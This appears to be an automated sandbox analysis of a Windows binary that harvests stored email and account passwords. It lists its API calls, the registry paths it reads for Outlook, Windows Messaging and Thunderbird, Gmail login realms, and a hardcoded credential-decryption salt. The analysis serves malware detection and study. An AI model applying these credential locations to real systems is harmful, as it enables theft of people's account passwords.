6808->6809 6824 4046e1 strcpy 6808->6824 6809->6554 6811 407249 6812 4047aa 3 API calls 6811->6812 6813 40724e 6812->6813 6814 4072e7 6813->6814 6816 407279 WideCharToMultiByte LocalFree 6813->6816 6815 4047fb FreeLibrary 6814->6815 6815->6809 6825 40f1f1 RegQueryValueExA 6816->6825 6818 4072c3 6826 40f1f1 RegQueryValueExA 6818->6826 6820 4072d9 6821 4060da 2 API calls 6820->6821 6821->6814 6822->6554 6823->6808 6824->6811 6825->6818 6826->6820 6828 4046cc FreeLibrary 6827->6828 6829 404659 LoadLibraryA 6828->6829 6830 4046c7 6829->6830 6831 40466a GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 6829->6831 6830->6563 6830->6564 6832 4046b3 6831->6832 6833 4046b9 6832->6833 6834 4046cc FreeLibrary 6832->6834 6833->6830 6834->6830 6836 4046d2 FreeLibrary 6835->6836 6837 403cd3 6835->6837 6836->6837 6837->6573 6838->6570 6839->6577 6840->6589 6841->6585 6842->6589 6843->6589 6844->6598 6845->6611 6846->6611 6847->6611 6887 40f1b0 RegOpenKeyExA 6848->6887 6850 402d8c 6851 402f98 6850->6851 6852 402197 memset 6850->6852 6851->6611 6853 402dac 6852->6853 6854 402197 memset 6853->6854 6855 402db7 6854->6855 6888 40f1f1 RegQueryValueExA 6855->6888 6857 402df3 6889 40f1f1 RegQueryValueExA 6857->6889 6859 402e09 6890 40f1f1 RegQueryValueExA 6859->6890 6861 402e1f 6891 40f1f1 RegQueryValueExA 6861->6891 6863 402e35 6892 40f1ca RegQueryValueExA 6863->6892 6865 402e46 6893 40f1ca RegQueryValueExA 6865->6893 6867 402e57 6894 40f214 RegQueryValueExA 6867->6894 6869 402e72 strcpy strcpy 6895 40f1f1 RegQueryValueExA 6869->6895 6872 402eb9 6896 40f1f1 RegQueryValueExA 6872->6896 6874 402ecf 6897 40f1ca RegQueryValueExA 6874->6897 6876 402ee3 6898 40f1ca RegQueryValueExA 6876->6898 6878 402ef7 6899 40f214 RegQueryValueExA 6878->6899 6880 402f12 strcpy strcpy 6882 402f48 6880->6882 6883 402f68 6882->6883 6884 4023c6 16 API calls 6882->6884 6885 402f8f RegCloseKey 6883->6885 6886 4023c6 16 API calls 6883->6886 6884->6883 6885->6851 6886->6885 6887->6850 
6888->6857 6889->6859 6890->6861 6891->6863 6892->6865 6893->6867 6894->6869 6895->6872 6896->6874 6897->6876 6898->6878 6899->6880 6921 4030f9 6900->6921 6902 40316a 6903 4030f9 GetPrivateProfileStringA 6902->6903 6904 403199 6903->6904 6905 4030f9 GetPrivateProfileStringA 6904->6905 6906 4031b2 6905->6906 6907 4030f9 GetPrivateProfileStringA 6906->6907 6908 4031c8 6907->6908 6909 4030f9 GetPrivateProfileStringA 6908->6909 6910 4031e1 6909->6910 6911 4030f9 GetPrivateProfileStringA 6910->6911 6912 4031f9 6911->6912 6913 403254 6912->6913 6924 401d19 strlen 6912->6924 6913->6619 6913->6620 6915 40321a 6915->6913 6916 4030f9 GetPrivateProfileStringA 6915->6916 6917 403234 6916->6917 6917->6913 6918 403239 strchr 6917->6918 6918->6913 6919 40324a 6918->6919 6920 4060da 2 API calls 6919->6920 6920->6913 6922 403113 GetPrivateProfileStringA 6921->6922 6922->6902 6925 401d34 6924->6925 6925->6915 6927 402197 memset 6926->6927 6928 4033c6 6927->6928 6929 402197 memset 6928->6929 6930 4033d1 6929->6930 6951 403371 GetPrivateProfileStringA 6930->6951 6932 403402 6952 403371 GetPrivateProfileStringA 6932->6952 6934 403414 6953 403371 GetPrivateProfileStringA 6934->6953 6936 403426 6954 403371 GetPrivateProfileStringA 6936->6954 6938 403438 6955 403371 GetPrivateProfileStringA 6938->6955 6940 40344a 6956 403371 GetPrivateProfileStringA 6940->6956 6942 40345c 6943 40347e 6942->6943 6957 403392 strlen 6942->6957 6945 4034a0 6943->6945 6947 403392 strlen 6943->6947 6945->6630 6949 403492 6947->6949 6948 4023c6 16 API calls 6948->6943 6950 4023c6 16 API calls 6949->6950 6950->6945 6951->6932 6952->6934 6953->6936 6954->6938 6955->6940 6956->6942 6958 40339f 6957->6958 6958->6948 6959->6639 7004 4046e1 strcpy 6960->7004 6962 40dc51 6963 404651 7 API calls 6962->6963 6964 40dc5f 6963->6964 6965 40dd39 6964->6965 6967 4047aa 3 API calls 6964->6967 6966 4046cc FreeLibrary 6965->6966 6968 40dd48 6966->6968 6971 40dc6c 6967->6971 6969 4047fb FreeLibrary 6968->6969 6970 40dd53 
6969->6970 6970->6639 6971->6965 6972 40dcee WideCharToMultiByte 6971->6972 6973 40dd30 LocalFree 6972->6973 6974 40dd0f strlen 6972->6974 6973->6965 6974->6973 6975 40dd1f strcpy 6974->6975 6975->6973 6977 40db41 6976->6977 6978 40dc25 RegCloseKey 6976->6978 6977->6978 6987 40dbc7 6977->6987 7005 4046e1 strcpy 6977->7005 6978->6639 6980 40db62 6982 4047aa 3 API calls 6980->6982 6988 40db67 6982->6988 6983 40dbf1 RegQueryValueExA 6983->6978 6984 40dc12 6983->6984 6984->6978 6985 40dbbc 6986 4047fb FreeLibrary 6985->6986 6986->6987 6987->6978 7006 40132a strlen 6987->7006 6988->6985 6989 40dbb3 LocalFree 6988->6989 6990 40db97 memcpy 6988->6990 6989->6985 6990->6989 6992 402197 memset 6991->6992 6993 4038c0 6992->6993 6994 4060da 2 API calls 6993->6994 6995 4038da 6994->6995 6996 4060da 2 API calls 6995->6996 6997 4038e7 6996->6997 6998 4060da 2 API calls 6997->6998 6999 4038f4 strchr 6998->6999 7000 403905 6999->7000 7001 403908 strcpy 6999->7001 7000->7001 7002 4023c6 16 API calls 7001->7002 7003 40393f 7002->7003 7003->6639 7004->6962 7005->6980 7007 401349 7006->7007 7007->6983 7019 40f1b0 RegOpenKeyExA 7008->7019 7010 41165c 7011 4037db 7010->7011 7020 40f1f1 RegQueryValueExA 7010->7020 7011->6649 7011->6650 7013 411675 7014 4116ad RegCloseKey 7013->7014 7021 40f1f1 RegQueryValueExA 7013->7021 7014->7011 7016 411692 7016->7014 7022 41194a 7016->7022 7019->7010 7020->7013 7021->7016 7034 411533 strlen 7022->7034 7024 411964 7025 411986 7024->7025 7036 4116be 7024->7036 7028 4116ab 7025->7028 7065 411a0f memset memset memset 7025->7065 7028->7014 7029 4119a1 7029->7028 7030 4119c1 memset 7029->7030 7031 4116be 21 API calls 7030->7031 7032 4119ed 7031->7032 7032->7028 7033 4119f7 strcpy 7032->7033 7033->7028 7035 411552 7034->7035 7035->7024 7037 412360 7036->7037 7038 4116cb memset 7037->7038 7039 411533 strlen 7038->7039 7040 4116f9 strlen 7039->7040 7041 411941 7040->7041 7042 411712 7040->7042 7041->7025 7042->7041 7043 41171a memset memset memset memset 
7042->7043 7044 411794 7043->7044 7080 40be4e 7044->7080 7046 4117a2 7087 40beec 7046->7087 7048 4117b1 memcpy 7049 4117cd 7048->7049 7050 40be4e 3 API calls 7049->7050 7051 4117de 7050->7051 7052 40beec 5 API calls 7051->7052 7053 4117ea memcpy memcpy 7052->7053 7054 411818 7053->7054 7055 40be4e 3 API calls 7054->7055 7056 411829 7055->7056 7057 40beec 5 API calls 7056->7057 7059 411835 7057->7059 7058 4118d2 strcpy 7060 4118f0 7058->7060 7059->7058 7059->7059 7061 40be4e 3 API calls 7060->7061 7062 4118fe 7061->7062 7063 40beec 5 API calls 7062->7063 7064 41190a memcpy memcpy 7063->7064 7064->7041 7066 411533 strlen 7065->7066 7067 411a73 strlen 7066->7067 7068 411a8b 7067->7068 7079 411b1a 7067->7079 7069 411a93 memcpy memcpy 7068->7069 7068->7079 7070 411ac1 7069->7070 7071 40be4e 3 API calls 7070->7071 7072 411ad3 7071->7072 7073 40beec 5 API calls 7072->7073 7074 411ae2 memcpy 7073->7074 7075 411b00 7074->7075 7076 40be4e 3 API calls 7075->7076 7077 411b11 7076->7077 7078 40beec 5 API calls 7077->7078 7078->7079 7079->7029 7081 40be65 7080->7081 7082 40be85 memcpy 7081->7082 7083 40be8c memcpy 7081->7083 7086 40bea3 7081->7086 7082->7046 7083->7086 7085 40beb2 memcpy 7085->7086 7086->7082 7086->7085 7088 40bf06 memset 7087->7088 7089 40bf2c memset 7087->7089 7094 40bf6b 7088->7094 7091 40bf3b 7089->7091 7093 40bf51 memcpy memset 7091->7093 7092 40bf1c memset 7092->7091 7093->7048 7094->7092 7096 412360 7095->7096 7097 40dd66 RegOpenKeyExA 7096->7097 7098 40debc 7097->7098 7099 40dd8d memset 7097->7099 7098->6672 7100 40dea2 RegEnumKeyA 7099->7100 7101 40deb3 RegCloseKey 7100->7101 7102 40ddba RegOpenKeyExA 7100->7102 7101->7098 7103 40de05 7102->7103 7104 40ddd8 RegQueryValueExA 7102->7104 7103->7100 7105 40de8b RegCloseKey 7103->7105 7106 4060da 2 API calls 7103->7106 7104->7103 7104->7105 7105->7103 7107 40de5b WideCharToMultiByte 7106->7107 7108 40de80 LocalFree 7107->7108 7108->7105 7110 406780 strcat 7109->7110 7111 40678e 7109->7111 7110->7111 7112 
4112ec 7111->7112 7129 406fd2 7112->7129 7115 411327 7116 41134e 7115->7116 7117 411332 7115->7117 7137 40702d 7115->7137 7118 406fd2 9 API calls 7116->7118 7154 411270 7117->7154 7120 41137a 7118->7120 7121 40702d 9 API calls 7120->7121 7122 4113a8 7120->7122 7127 4112ec 65 API calls 7120->7127 7147 406f97 7120->7147 7121->7120 7151 4070c5 7122->7151 7126 4070c5 FindClose 7128 4113be 7126->7128 7127->7120 7128->6694 7130 4070c5 FindClose 7129->7130 7131 406fdf 7130->7131 7132 4060da 2 API calls 7131->7132 7133 406ff2 strlen strlen 7132->7133 7134 407016 7133->7134 7136 40701f 7133->7136 7135 4062b7 4 API calls 7134->7135 7135->7136 7136->7115 7138 407038 FindFirstFileA 7137->7138 7139 407059 FindNextFileA 7137->7139 7142 407074 7138->7142 7140 40707b strlen strlen 7139->7140 7141 40706f 7139->7141 7144 4070b4 7140->7144 7145 4070ab 7140->7145 7143 4070c5 FindClose 7141->7143 7142->7140 7142->7144 7143->7142 7144->7115 7146 4062b7 4 API calls 7145->7146 7146->7144 7148 406fa1 strcmp 7147->7148 7149 406fc9 7147->7149 7148->7149 7150 406fb8 strcmp 7148->7150 7149->7120 7150->7149 7152 4070d8 7151->7152 7153 4070ce FindClose 7151->7153 7152->7126 7153->7152 7165 405ed5 CreateFileA 7154->7165 7156 41127b 7157 411284 GetFileSize 7156->7157 7158 4112e8 7156->7158 7159 411297 ??2@YAPAXI SetFilePointer 7157->7159 7160 4112dd CloseHandle 7157->7160 7158->7115 7166 406725 ReadFile 7159->7166 7160->7158 7162 4112be 7167 411133 7162->7167 7165->7156 7166->7162 7168 412360 7167->7168 7169 411140 wcslen ??2@YAPAXI WideCharToMultiByte 7168->7169 7182 4104ae 7169->7182 7171 411179 7172 411199 strlen 7171->7172 7194 41061f 7172->7194 7174 4111b9 memcpy 7197 41072a 7174->7197 7176 411217 ??3@YAXPAX 7207 410596 7176->7207 7178 4060da 2 API calls 7178->7176 7225 406578 memset 7182->7225 7184 4104c1 ??2@YAPAXI 7185 4104d0 7184->7185 7186 4104d9 ??2@YAPAXI 7185->7186 7187 4104eb 7186->7187 7188 4104f4 ??2@YAPAXI 7187->7188 7189 41050b ??2@YAPAXI 7188->7189 7191 41052f ??2@YAPAXI 
7189->7191 7193 410553 7191->7193 7193->7171 7195 410634 ??2@YAPAXI 7194->7195 7196 410629 ??3@YAXPAX 7194->7196 7195->7174 7196->7195 7226 406a7d free free 7197->7226 7199 41075c 7227 406a7d free free 7199->7227 7201 410a3f 7201->7176 7201->7178 7202 406b54 4 API calls 7205 410767 7202->7205 7203 41064b 19 API calls 7203->7205 7204 4108c0 memcpy 7204->7205 7205->7201 7205->7202 7205->7203 7205->7204 7228 40feb1 7205->7228 7208 4105a3 ??3@YAXPAX 7207->7208 7209 4105ae 7207->7209 7208->7209 7210 4105c5 7209->7210 7211 406b8a free 7209->7211 7212 406b8a free 7210->7212 7214 4105db 7210->7214 7215 4105be ??3@YAXPAX 7211->7215 7216 4105d4 ??3@YAXPAX 7212->7216 7213 4105f1 7218 410607 7213->7218 7237 406a7d free free 7213->7237 7214->7213 7217 406b8a free 7214->7217 7215->7210 7216->7214 7219 4105ea ??3@YAXPAX 7217->7219 7221 41061d ??3@YAXPAX 7218->7221 7238 406a7d free free 7218->7238 7219->7213 7221->7160 7222 410600 ??3@YAXPAX 7222->7218 7224 410616 ??3@YAXPAX 7224->7221 7225->7184 7226->7199 7227->7205 7229 4102a6 7228->7229 7230 41048d 7228->7230 7229->7230 7231 4102cc strlen strncmp 7229->7231 7232 410409 strlen strncmp 7229->7232 7233 4103dc memcpy 7229->7233 7235 410354 memcpy atoi WideCharToMultiByte 7229->7235 7230->7205 7231->7229 7232->7229 7236 406541 strtoul 7233->7236 7235->7229 7236->7229 7237->7222 7238->7224 7239->6711 7240->6711 7242 402661 memset 7241->7242 7256 40f1f1 RegQueryValueExA 7242->7256 7244 40268a 7244->7242 7245 402197 memset 7244->7245 7246 402785 RegCloseKey 7244->7246 7247 4026a0 strcpy 7245->7247 7246->6711 7257 40f1f1 RegQueryValueExA 7247->7257 7249 40f1f1 RegQueryValueExA 7251 4026d9 7249->7251 7250 40f1ca RegQueryValueExA 7250->7251 7251->7249 7251->7250 7258 40242b 7251->7258 7253 40275a strcpy 7254 4023c6 16 API calls 7253->7254 7254->7244 7255->6711 7256->7244 7257->7251 7270 40f214 RegQueryValueExA 7258->7270 7260 40245f 7261 402491 7260->7261 7264 402558 7260->7264 7269 40250a 7260->7269 7262 4024f3 7261->7262 7263 40249e 

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00407418
                  • memset.MSVCRT ref: 0040742C
                  • memset.MSVCRT ref: 00407446
                  • memset.MSVCRT ref: 0040745B
                  • GetComputerNameA.KERNEL32(?,?), ref: 0040747D
                  • GetUserNameA.ADVAPI32(?,?), ref: 00407491
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074B0
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004074C5
                  • strlen.MSVCRT ref: 004074CE
                  • strlen.MSVCRT ref: 004074DD
                  • memcpy.MSVCRT ref: 004074EF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  Similarity
                  • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                  • String ID: 5$H$O$b$i$}$}
                  • API String ID: 1832431107-3760989150

                  Control-flow Graph

                  APIs
                    • Part of subcall function 0040EF05: FreeLibrary.KERNELBASE(?,0040EF39,?,?,?,?,?,?,00404221), ref: 0040EF11
                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C36
                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4B
                  • strcpy.MSVCRT(?,?), ref: 00403E55
                  Strings
                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3C
                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD7
                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C91
                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C87
                  • pstorec.dll, xrefs: 00403C31
                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9B
                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D43
                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA5
                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA5
                  • PStoreCreateInstance, xrefs: 00403C45
                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6F
                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFC
                  Similarity
                  • API ID: Library$AddressFreeLoadProcstrcpy
                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                  • API String ID: 2884822230-317895162
                  APIs
                  • FindFirstFileA.KERNELBASE(00000103,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407043
                  • FindNextFileA.KERNELBASE(000000FF,00000247,?,?,0041134A,*.oeaccount,0041141B,?,00000104), ref: 00407061
                  • strlen.MSVCRT ref: 00407091
                  • strlen.MSVCRT ref: 00407099
                  Similarity
                  • API ID: FileFindstrlen$FirstNext
                  • String ID:
                  • API String ID: 379999529-0
                  APIs
                  • FindResourceA.KERNEL32(?,?,?), ref: 0040F389
                  • SizeofResource.KERNEL32(?,00000000), ref: 0040F39A
                  • LoadResource.KERNEL32(?,00000000), ref: 0040F3AA
                  • LockResource.KERNEL32(00000000), ref: 0040F3B5
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID:
                  • API String ID: 3473537107-0

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00401E6C
                    • Part of subcall function 0040F4CA: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000104), ref: 0040F501
                  • strlen.MSVCRT ref: 00401E85
                  • strlen.MSVCRT ref: 00401E93
                  • strlen.MSVCRT ref: 00401ED9
                  • strlen.MSVCRT ref: 00401EE7
                  • memset.MSVCRT ref: 00401F92
                  • atoi.MSVCRT ref: 00401FC1
                  • memset.MSVCRT ref: 00401FE4
                  • sprintf.MSVCRT ref: 00402011
                    • Part of subcall function 0040F232: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040F26B
                  • memset.MSVCRT ref: 00402067
                  • memset.MSVCRT ref: 0040207C
                  • strlen.MSVCRT ref: 00402082
                  • strlen.MSVCRT ref: 00402090
                  • strlen.MSVCRT ref: 004020C3
                  • strlen.MSVCRT ref: 004020D1
                  • memset.MSVCRT ref: 00401FF9
                    • Part of subcall function 004062B7: strcpy.MSVCRT(00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062BF
                    • Part of subcall function 004062B7: strcat.MSVCRT(00000000,00000000,00000000,00000000,sqlite3.dll,004020F7,00000000,nss3.dll), ref: 004062CE
                  • strcpy.MSVCRT(?,00000000), ref: 00402158
                  • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402162
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040217D
                    • Part of subcall function 00406155: GetFileAttributesA.KERNELBASE(?,00408328,?,004083DE,00000000,?,00000000,00000104,?), ref: 00406159
                  Similarity
                  • API ID: strlen$memset$Closestrcpy$AttributesEnvironmentExpandFileFolderPathSpecialStringsatoisprintfstrcat
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                  • API String ID: 1212093029-4223776976

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404841: LoadLibraryA.KERNEL32(comctl32.dll,76F90A60,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404860
                    • Part of subcall function 00404841: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404872
                    • Part of subcall function 00404841: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040BBA9,76F90A60), ref: 00404886
                    • Part of subcall function 00404841: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004048B1
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040BDD9
                  • DeleteObject.GDI32(?), ref: 0040BDEF
                  Similarity
                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !$l4A$|EA
                  • API String ID: 745651260-3164406189

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00407D23: LoadMenuA.USER32(00000000), ref: 00407D2B
                    • Part of subcall function 00407D23: sprintf.MSVCRT ref: 00407D4E
                  • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 0040A9C1
                  • #6.COMCTL32(50000000,0041344F,?,00000101), ref: 0040A9DC
                  • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040A9F4
                  • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040AA0A
                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000007,00000000,00000000,?,00000008,00000010,00000010,00000070,00000010,00000014), ref: 0040AA34
                  • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040AA6A
                  • LoadIconA.USER32(00000066,00000000), ref: 0040AAD9
                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 0040AAE7
                  • _stricmp.MSVCRT(0041344F,/noloadsettings), ref: 0040AB31
                  • RegDeleteKeyA.ADVAPI32(80000001,0041344F), ref: 0040AB46
                  • SetFocus.USER32(?,00000000), ref: 0040AB6C
                  • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\), ref: 0040AB85
                  • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\), ref: 0040AB95
                  • strlen.MSVCRT ref: 0040AB9C
                  • strlen.MSVCRT ref: 0040ABAA
                  • RegisterWindowMessageA.USER32(commdlg_FindReplace,?,00000001), ref: 0040AC06
                    • Part of subcall function 0040492F: strlen.MSVCRT ref: 0040494C
                    • Part of subcall function 0040492F: SendMessageA.USER32(00000000,0000101B,00000000,?), ref: 00404970
                  • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040AC51
                  • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040AC64
                  Similarity
                  • API ID: Message$Send$Loadstrlen$CreateIconImageWindow$AttributesCallbackDeleteDispatcherFileFocusList_MenuPathRegisterReplaceTempToolbarUser_stricmpsprintf
                  • String ID: /noloadsettings$C:\Users\user\AppData\Local\Temp\$O4A$SysListView32$commdlg_FindReplace$report.html
                  • API String ID: 2016272751-3164717526

                  Control-flow Graph

                  APIs
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040A07B
                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040A0B0
                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
                  • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040A0E5
                  • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040A101
                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040A10D
                  • GetSysColor.USER32(0000000F), ref: 0040A111
                  • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 0040A12C
                  • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 0040A139
                  • DeleteObject.GDI32(?), ref: 0040A145
                  • DeleteObject.GDI32(00000000), ref: 0040A148
                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040A166
                  Similarity
                  • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                  • String ID:
                  • API String ID: 3411798969-0

                  Control-flow Graph

                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E088
                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E80,?), ref: 0040E0A2
                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E80,?), ref: 0040E0CD
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E80,?), ref: 0040E17E
                    • Part of subcall function 004047AA: LoadLibraryA.KERNELBASE(?,0040DC6C,80000001,76DBEC10), ref: 004047B2
                    • Part of subcall function 004047AA: GetProcAddress.KERNEL32(00000000,?), ref: 004047CA
                  • memcpy.MSVCRT ref: 0040E13B
                  • memcpy.MSVCRT ref: 0040E150
                    • Part of subcall function 0040DD59: RegOpenKeyExA.ADVAPI32(p@,Creds,00000000,00020019,p@,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040E170,?,?,?,?), ref: 0040DD83
                    • Part of subcall function 0040DD59: memset.MSVCRT ref: 0040DDA1
                    • Part of subcall function 0040DD59: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040DEA5
                    • Part of subcall function 0040DD59: RegCloseKey.ADVAPI32(?), ref: 0040DEB6
                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E80,?), ref: 0040E174
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E80,?), ref: 0040E188
                  Similarity
                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                  • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                  • API String ID: 2768085393-1693574875

                  Control-flow Graph

                  APIs
                  • SetBkMode.GDI32(?,00000001), ref: 0040B6CF
                  • SetTextColor.GDI32(?,00FF0000), ref: 0040B6DD
                  • SelectObject.GDI32(?,?), ref: 0040B6F2
                  • DrawTextExA.USER32(?,?,000000FF,?,00000004,?), ref: 0040B727
                  • SelectObject.GDI32(00000014,?), ref: 0040B733
                    • Part of subcall function 0040B48C: GetCursorPos.USER32(?), ref: 0040B499
                    • Part of subcall function 0040B48C: GetSubMenu.USER32(?,00000000), ref: 0040B4A7
                    • Part of subcall function 0040B48C: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0040B4D4
                  • LoadCursorA.USER32(00000067), ref: 0040B754
                  • SetCursor.USER32(00000000), ref: 0040B75B
                  • PostMessageA.USER32(?,0000041C,00000000,00000000), ref: 0040B77D
                  • SetFocus.USER32(?), ref: 0040B7B8
                  • SetFocus.USER32(?), ref: 0040B831
                  Similarity
                  • API ID: Cursor$FocusMenuObjectSelectText$ColorDrawLoadMessageModePopupPostTrack
                  • String ID:
                  • API String ID: 1416211542-0

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 343 41211a-412136 call 412308 GetModuleHandleA 346 412157-41215a 343->346 347 412138-412143 343->347 349 412183-4121d0 __set_app_type __p__fmode __p__commode call 412304 346->349 347->346 348 412145-41214e 347->348 351 412150-412155 348->351 352 41216f-412173 348->352 356 4121d2-4121dd __setusermatherr 349->356 357 4121de-412238 call 4122f2 _initterm __getmainargs _initterm 349->357 351->346 354 41215c-412163 351->354 352->346 355 412175-412177 352->355 354->346 358 412165-41216d 354->358 359 41217d-412180 355->359 356->357 362 412274-412277 357->362 363 41223a-412242 357->363 358->359 359->349 366 412251-412255 362->366 367 412279-41227d 362->367 364 412244-412246 363->364 365 412248-41224b 363->365 364->363 364->365 365->366 368 41224d-41224e 365->368 369 412257-412259 366->369 370 41225b-41226c GetStartupInfoA 366->370 367->362 368->366 369->368 369->370 371 41227f-412281 370->371 372 41226e-412272 370->372 373 412282-412289 GetModuleHandleA call 40bb8d 371->373 372->373 375 41228e-412296 373->375 376 412298-412299 exit 375->376 377 41229f-4122df _cexit call 412341 375->377 376->377
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2791520693.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.2791507099.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791537341.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791549829.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2791561829.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                  • String ID:
                  • API String ID: 3662548030-0
                  • Opcode ID: 0cd59659463b3ba6b54fd34f3b5747a647caaa08127f994ca48f4bf1f9d9109b
